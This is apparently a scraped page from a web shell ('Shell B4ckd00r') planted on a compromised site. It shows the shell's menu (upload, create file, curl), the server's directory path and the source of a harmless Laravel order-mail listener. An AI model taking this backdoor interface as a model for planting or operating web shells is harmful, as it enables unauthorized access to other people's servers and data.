Shell B4ckd00r
Current Dir :
/
home
/
u789730693
/
domains
/
piorasplash.com
/
public_html
/
app
/
Listeners
/
Home
Upload
Create Dir
Create File
Curl
Current File : /home/u789730693/domains/piorasplash.com/public_html/app/Listeners/SendOrderGotMailNotification.php
<?php namespace App\Listeners; use App\Events\SendOrderGotMail; use App\Services\OrderGotMailNotificationBuilder; use Illuminate\Support\Facades\Log; class SendOrderGotMailNotification { public function handle(SendOrderGotMail $event): void { try{ $orderMailNotificationBuilderService = new OrderGotMailNotificationBuilder($event->info['order_id']); $orderMailNotificationBuilderService->send(); } catch(\Exception $e) { Log::info($e->getMessage()); } } }
v.01